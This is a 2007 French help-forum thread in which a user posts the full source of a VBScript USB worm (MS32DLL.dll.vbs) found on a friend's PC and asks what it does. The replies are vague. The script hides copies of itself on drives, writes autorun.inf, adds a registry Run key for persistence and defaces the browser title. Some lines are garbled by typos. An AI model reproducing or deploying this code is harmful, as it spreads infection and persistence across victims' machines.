Partage
  • Partager sur Facebook
  • Partager sur Twitter

Problème Incroyable ! O_o

Venez voir ! Vous serrez surpris !

20 janvier 2007 à 19:34:36

:) S@lut tout le Monde !

:D Je suis quasiment sûr que vous pouvez répondre à ce petit problème ! :lol:
Ne vous inquiétez pas, je cherche une solution aussi !

Ce problème est " NOUVEAU " !
Ce problème à déjà été posé mais personne n'a encore vraiment répondu alors c'est nous qui allons essayer de trouver cette solution !


Il y a peu de temps, sur le PC d'un ami, j'ai vu que pour ouvrir son Disque Dur, il ne procédait pas comme d'habitude !

Mais comment faisait-il alors ?


Il devait faire " Clique-droit " et " Ouvrir " !

Quand soudain, je vis cela :

MS32DLL.dll.vbs


Je me suis d'abord demandé ce que c'étais lorsque je décidais alors de l'ouvrir avec le " Bloc-Notes "
Et je vis cela comme code !


'My name is slow but sure v0.04
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,check,sd
atr = "[autorun]"&vbclrf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf atributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path<> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path&"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&",winpath&"\MS32DLL.dll.vbs
"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzolla"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobjet("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname


o_O C'est quelque chose d'incroyable !
^^ Si vous avez la Solution ! Faut la dire parce que mon " Copain " est en train de tout casser ! :lol:

Voilà ! A vos idées et vos solutions !


  • Partager sur Facebook
  • Partager sur Twitter
20 janvier 2007 à 20:10:57

c pas incroyable du tout.
tu dis que il peut pas ouvrir son disk dur en faisant un double clik mais kil doit louvrir en faisant clik droit ouvrir ?
  • Partager sur Facebook
  • Partager sur Twitter
20 janvier 2007 à 20:12:07

Franchement je ne vois pas trop qu'est-ce que le problème, mais c'est vrai que je trouve ça assez incredible! Enfin franchement, je n'y connais rien du tout!
  • Partager sur Facebook
  • Partager sur Twitter
20 janvier 2007 à 20:17:20

Je sais pas ce que c'est mais essaye de lancer une autre disque dur ou essaye de boutter sur nunux !
  • Partager sur Facebook
  • Partager sur Twitter
20 janvier 2007 à 21:51:34

ouais essaye linux
et essaye l'antivirus, spyware,adaware, antivirus en ligne...
  • Partager sur Facebook
  • Partager sur Twitter
Anonyme
20 janvier 2007 à 21:51:51

Ça n'a rien d'incroyable : au vu de l'extension du fichier, ce dernier est un Visual Basic Script. Pas compilé, et donc lisible clairement.

Ou alors j'ai pas pigé.
  • Partager sur Facebook
  • Partager sur Twitter
20 janvier 2007 à 23:09:12

Citation : the chemist

ouais essaye linux
et essaye l'antivirus, spyware,adaware, antivirus en ligne...


On a déjà essayé et rien à faire ! :p
L'ani-virus ne détecte RIEN ! o_O

  • Partager sur Facebook
  • Partager sur Twitter
20 janvier 2007 à 23:31:55

Mais le problème c'est quoi ? o_O
  • Partager sur Facebook
  • Partager sur Twitter
21 janvier 2007 à 0:35:35

Le message qui suit est une réponse automatique activée par un modérateur.
Les réponses automatiques permettent d'éviter aux modérateurs d'avoir à répéter de nombreuses fois la même chose, et donc de leur faire gagner beaucoup de temps.
Nous sommes néanmoins ouverts et si vous avez une question ou une remarque, n'hésitez pas à contacter le modérateur en question par MP.


Le titre du sujet est incorrect


Bonjour,



Ce sujet a un titre qui ne décrit pas correctement le sujet, ou le titre est en majuscules. Vous pouvez re-poster votre sujet en rectifiant ce point.

Voici quelques correspondances pour vous aider à choisir au mieux votre titre :


Merci de votre compréhension :)
Les modérateurs.
  • Partager sur Facebook
  • Partager sur Twitter